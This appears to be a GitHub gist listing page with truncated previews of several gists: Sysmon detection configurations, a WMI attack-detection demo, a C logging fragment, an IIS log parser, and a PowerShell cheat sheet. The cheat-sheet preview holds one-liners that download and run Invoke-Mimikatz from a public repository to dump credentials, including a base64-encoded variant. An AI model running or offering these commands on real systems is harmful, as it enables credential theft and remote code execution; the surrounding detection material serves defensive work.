Neo23x0
/ config-server.xml
Last active
March 11, 2024 14:34
Sysmon Base Configuration - Windows Server
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- | |
| This is a Microsoft Sysmon configuation to be used on Windows server systems | |
| v0.2.1 December 2016 | |
| Florian Roth | |
| The focus of this configuration is | |
| - hacking activity on servers / lateral movement (bad admin, attacker) | |
| It is not focussed on | |
| - malware detection (execution) | |
| - malware detection (network connections) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- | |
| This is a Microsoft Sysmon configuration to be used on Windows workstations | |
| v0.2.1 December 2016 | |
| Florian Roth (with the help and ideas of others) | |
| The focus of this configuration is | |
| - malware detection (execution) | |
| - malware detection (network connections) | |
| - exploit detection | |
| It is not focussed on |
mattifestation
/ WMI_attack_detection.ps1
Last active
March 16, 2021 23:02
BlueHat 2016 - WMI attack detection demo
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #region Scriptblocks that will execute upon alert trigger | |
| $LateralMovementDetected = { | |
| $Event = $EventArgs.NewEvent | |
| $EventTime = [DateTime]::FromFileTime($Event.TIME_CREATED) | |
| $MethodName = $Event.MethodName | |
| $Namespace = $Event.Namespace | |
| $Object = $Event.ObjectPath | |
| $User = $Event.User |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* | |
| #mimikatz [local] | |
| IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; | |
| #encoded-mimikatz [local] | |
| powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBl |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <WinInet.h> | |
| #include <ntsecapi.h> | |
| void writeToLog(const char* szString) | |
| { | |
| FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+"); | |
| if (NULL == pFile) | |
| { |
jstangroome
/ ConvertFrom-IISW3CLog.ps1
Created
August 8, 2013 23:06
Function to convert lines in an IIS W3C log file to PowerShell objects
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function ConvertFrom-IISW3CLog { | |
| [CmdletBinding()] | |
| param ( | |
| [Parameter(Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName)] | |
| [Alias('PSPath')] | |
| [string[]] | |
| $Path | |
| ) | |
| process { |